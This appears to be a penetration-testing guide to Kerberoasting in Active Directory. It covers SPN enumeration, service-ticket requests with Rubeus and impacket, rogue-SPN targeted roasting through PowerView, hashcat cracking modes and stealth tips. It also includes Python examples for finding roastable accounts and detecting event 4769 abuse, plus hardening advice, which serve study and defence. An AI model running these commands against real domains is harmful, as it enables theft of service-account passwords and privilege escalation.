Overview
Kerberoasting abuses the service ticket (TGS) issuing step of Kerberos. Any authenticated domain user can request a service ticket for any ServicePrincipalName (SPN) registered in the domain, and the ticket's encrypted part is protected with the long-term key of the account that owns the SPN. When that owner is a user account, the key is derived from the account's password (for RC4-HMAC tickets it is the NT hash itself), so the ticket can be taken offline and cracked by guessing passwords. No privilege is needed to request the tickets and nothing is ever sent to the service, which makes the attack cheap and quiet. Tickets issued with RC4-HMAC (etype 23) crack far faster than AES tickets, so RC4-capable accounts are the primary targets.
Discovery
Requirements:
- Any valid domain account
- A user account with a non-empty ServicePrincipalName attribute
Windows enumeration:
# Using PowerView to find vulnerable accounts
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
# Using the ActiveDirectory module to find vulnerable accounts (Get-ADObject/Get-ADUser require a filter; krbtgt is excluded because its key is not crackable in practice)
Get-ADUser -Filter 'servicePrincipalName -like "*"' -Properties servicePrincipalName | Where-Object { $_.SamAccountName -ne 'krbtgt' } | Select-Object SamAccountName, Enabled, servicePrincipalName
# Using Rubeus to find vulnerable accounts
.\Rubeus.exe kerberoast /stats
# Built-in binary (also lists computer-account SPNs, whose keys are random and not crackable)
setspn.exe -Q */*
Linux enumeration:
# Using ldapsearch to find kerberoastable users: enabled user accounts (userAccountControl bit 512 set, bit 2 clear) with an SPN, excluding krbtgt
ldapsearch -LLL -x -H ldap://[IP] -D "[USERNAME]@[DOMAIN].[TLD]" -W -b "dc=[DOMAIN],dc=[TLD]" "(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(sAMAccountName=krbtgt)))" sAMAccountName servicePrincipalName
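The conditions in the ldapsearch filter are easy to copy and hard to read, so here is the same logic as an added Python example (not from the original page) that evaluates them over constructed directory entries and goes one step further than the filter: it reads msDS-SupportedEncryptionTypes to predict whether the service ticket will come back RC4 (fast to crack) or AES. The account names, SPNs and attribute values are made up.

```python
# Added example, not from the original page: the ldapsearch filter's logic in
# Python over constructed entries, plus a ranking by the key type the service
# ticket will carry. Entries, names and SPNs below are made up.

UAC_ACCOUNTDISABLE = 0x0002   # userAccountControl bit 2
UAC_NORMAL_ACCOUNT = 0x0200   # userAccountControl bit 512 (a user, not a computer/trust account)
# msDS-SupportedEncryptionTypes bits that matter for Kerberoasting
ETYPE_RC4_HMAC = 0x04
ETYPE_AES128 = 0x08
ETYPE_AES256 = 0x10

SAMPLE_ENTRIES = [  # constructed, shaped like parsed ldapsearch results
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x10200,
     "servicePrincipalName": ["HTTP/web01.corp.local"],
     "msDS-SupportedEncryptionTypes": ETYPE_AES128 | ETYPE_AES256},
    {"sAMAccountName": "svc_old", "userAccountControl": 0x10202,   # disabled
     "servicePrincipalName": ["HOST/old01.corp.local"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x10202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200},    # no SPN
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000,   # computer account
     "servicePrincipalName": ["HOST/web01.corp.local"]},
]


def is_kerberoastable(entry):
    """The LDAP filter's four conditions; ':1.2.840.113556.1.4.803:=' is a bitwise AND."""
    uac = entry.get("userAccountControl", 0)
    return (bool(entry.get("servicePrincipalName"))
            and bool(uac & UAC_NORMAL_ACCOUNT)
            and not uac & UAC_ACCOUNTDISABLE
            and entry.get("sAMAccountName", "").lower() != "krbtgt")


def expected_ticket_etype(entry):
    """Key the KDC uses when the client asks for RC4 (the Rubeus/impacket default):
    an unset attribute or the RC4 bit yields an RC4-HMAC ticket under the NT hash
    (fast to crack); an AES-only account yields an AES ticket (much slower)."""
    supported = entry.get("msDS-SupportedEncryptionTypes")
    if not supported or supported & ETYPE_RC4_HMAC:
        return "rc4"
    if supported & (ETYPE_AES128 | ETYPE_AES256):
        return "aes"
    return "none"


def find_targets(entries):
    """(account, expected etype, SPNs) for every kerberoastable entry, RC4 targets first."""
    hits = [(e["sAMAccountName"], expected_ticket_etype(e), e["servicePrincipalName"])
            for e in entries if is_kerberoastable(e)]
    return sorted(hits, key=lambda hit: hit[1] != "rc4")


if __name__ == "__main__":
    for account, etype, spns in find_targets(SAMPLE_ENTRIES):
        print(f"{account:10} {etype:4} {', '.join(spns)}")
```

Running it on the constructed entries lists svc_sql (RC4) before svc_web (AES-only), and drops the disabled account, krbtgt, the SPN-less user and the computer account, exactly as the LDAP filter would.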
Exploitation
Windows:
# Using Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoast.hash
# Rubeus with explicit credentials (when the current session is not a domain user)
.\Rubeus.exe kerberoast /outfile:kerberoast.hash /creduser:[DOMAIN]\[USERNAME] /credpassword:[PASSWORD]
# Using PowerView
Request-SPNTicket -SPN "[SPN]" -Format Hashcat
Linux:
# Password is prompted for
impacket-GetUserSPNs -request -dc-ip [IP] [DOMAIN]/[USER] -outputfile kerberoast.hash
# Pass the hash
impacket-GetUserSPNs -request -dc-ip [IP] -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USER] -outputfile kerberoast.hash
Kerberos rejects requests when the client clock differs from the DC by more than the domain's tolerance (five minutes by default), so if you get a clock skew error (KRB_AP_ERR_SKEW), synchronise your clock with the DC and retry.
Targeted Kerberoast
Targeted Kerberoasting goes after one chosen account instead of whatever already has an SPN. If the attacker controls an object with write rights over the target's servicePrincipalName attribute, they can add an arbitrary SPN to the target, request a service ticket for it, crack the ticket to recover the target's password, and then remove the SPN again.
Discovery
Requirements:
- Any valid domain account
- One of the following permissions over the target:
  - GenericAll
  - GenericWrite
  - WriteProperty (on servicePrincipalName)
  - Validated-SPN (validated write to servicePrincipalName)
Use BloodHound to find users that are susceptible to this attack.
Exploitation
- Authenticate as the user with one of the required permissions.
# Use a credential object if your session is not for the desired user
$SecPassword = ConvertTo-SecureString '[PASSWORD]' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('[DOMAIN]\[USERNAME]', $SecPassword)
- Add an SPN to the target account. SPNs must be unique in the forest, so use a value no other account holds: DCs reject duplicate SPNs, and a clash would break Kerberos authentication for the real service.
# Set the SPN for the target account - uses PowerView
# Omit -Credential if the current session already has the required rights
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -Set @{serviceprincipalname='random/garbage'}
- Kerberoast the target as in the Exploitation section above.
- Cleanup - remove the SPN so the account is not left Kerberoastable.
# Omit -Credential if not needed
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -Clear serviceprincipalname
Post-Exploitation
Once a service ticket is obtained, its encrypted part can be cracked with hashcat to recover the service account's password. Mode 13100 is for RC4-HMAC tickets (etype 23, the $krb5tgs$23$ lines produced above); AES tickets use mode 19600 (etype 17) or 19700 (etype 18) and are far slower to crack.
# Simple dictionary attack
hashcat -a 0 -m 13100 ./kerberoast.hash [wordlist]
Detection & Evasion
Kerberoasting generates Windows event 4769 (A Kerberos service ticket was requested) on the domain controller. Every legitimate service ticket request logs the same event, so the raw volume is useless; the signal is in the fields:
- Ticket Encryption Type 0x17 (RC4-HMAC), which Rubeus and impacket request by default, in a domain whose clients otherwise negotiate AES (0x12 / 0x11).
- One account or client address requesting tickets for many distinct service names in a short window, ignoring computer accounts (names ending in $) and krbtgt.
- Any request for a decoy account that carries an SPN but runs no service (a honeypot).
Targeted Kerberoasting additionally modifies the servicePrincipalName attribute, which appears as event 5136 (A directory service object was modified) when Directory Service Changes auditing and an object SACL are configured.
Evasion on the attacker side comes down to blending in: roast only the accounts you need rather than the whole domain, space requests out, and avoid asking for RC4 tickets from accounts that support AES (Rubeus kerberoast /rc4opsec skips AES-enabled accounts). The hardening that defeats the attack is AES-only service accounts (msDS-SupportedEncryptionTypes), group Managed Service Accounts, and long random passwords for any user account that must hold an SPN.
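As an added example (not from the original page), here are the detection rules above run over a handful of constructed 4769 event summaries in Python: flag a requester that collects RC4 (0x17) tickets for several distinct service accounts within a short window, skipping computer accounts and krbtgt, and flag any request for a decoy account. Field names follow the 4769 event (TargetUserName as requester, ServiceName, TicketEncryptionType, IpAddress); the event lines, the decoy name svc_backup_legacy, the window and the threshold are assumptions to tune per environment.

```python
# Added example, not from the original page: a first-pass detector over 4769
# ("A Kerberos service ticket was requested") events. The lines below are
# constructed summaries of the fields that matter (TargetUserName = requester,
# ServiceName, TicketEncryptionType, IpAddress); the decoy account is made up.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"               # TicketEncryptionType for RC4-HMAC (AES128 is 0x11, AES256 is 0x12)
WINDOW = timedelta(minutes=10)  # assumption: tune to the environment
THRESHOLD = 3                   # distinct RC4 service tickets per requester inside WINDOW
HONEYPOT_SERVICES = {"svc_backup_legacy"}   # decoy accounts with an SPN that no real client uses

SAMPLE_LINES = [  # constructed: time;requester;service (the account name, not the SPN);etype;ip
    "time=2024-05-02T09:00:01;requester=jdoe;service=svc_sql;etype=0x17;ip=10.0.0.55",
    "time=2024-05-02T09:00:02;requester=jdoe;service=svc_web;etype=0x17;ip=10.0.0.55",
    "time=2024-05-02T09:00:02;requester=jdoe;service=WEB01$;etype=0x17;ip=10.0.0.55",
    "time=2024-05-02T09:00:03;requester=jdoe;service=svc_backup;etype=0x17;ip=10.0.0.55",
    "time=2024-05-02T09:05:00;requester=mallory;service=svc_sql;etype=0x17;ip=10.0.0.20",
    "time=2024-05-02T09:06:00;requester=mallory;service=FS01$;etype=0x12;ip=10.0.0.20",
    "time=2024-05-02T10:00:00;requester=mallory;service=svc_web;etype=0x17;ip=10.0.0.20",
    "time=2024-05-02T11:30:00;requester=amy;service=svc_backup_legacy;etype=0x17;ip=10.0.0.77",
]


def parse_event(line):
    """'key=value;...' summary line -> dict with a datetime under 'time'."""
    event = dict(field.split("=", 1) for field in line.split(";"))
    event["time"] = datetime.fromisoformat(event["time"])
    return event


def detect(events):
    """Alerts as tuples: ('honeypot', requester, service) or ('rc4_spray', requester, [services])."""
    alerts = []
    rc4_by_requester = defaultdict(list)
    for event in sorted(events, key=lambda e: e["time"]):
        if event["service"] in HONEYPOT_SERVICES:
            alerts.append(("honeypot", event["requester"], event["service"]))
        # AES tickets, computer accounts (name ends in $) and the TGT service are noise for the spray rule
        if event["etype"] != RC4_HMAC or event["service"].endswith("$") or event["service"] == "krbtgt":
            continue
        rc4_by_requester[event["requester"]].append(event)
    for requester, events_for_user in rc4_by_requester.items():
        for i, start in enumerate(events_for_user):   # sliding window anchored at each request
            in_window = [e for e in events_for_user[i:] if e["time"] - start["time"] <= WINDOW]
            services = {e["service"] for e in in_window}
            if len(services) >= THRESHOLD:
                alerts.append(("rc4_spray", requester, sorted(services)))
                break
    return alerts


def run_sample():
    return detect([parse_event(line) for line in SAMPLE_LINES])


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On the constructed events this raises two alerts: jdoe's burst of RC4 tickets for three service accounts (the computer account WEB01$ is ignored), and amy's request for the decoy. mallory, whose two RC4 requests are 55 minutes apart, stays below the threshold; in a real deployment the threshold and window should be set from a baseline of how many distinct service accounts ordinary users touch.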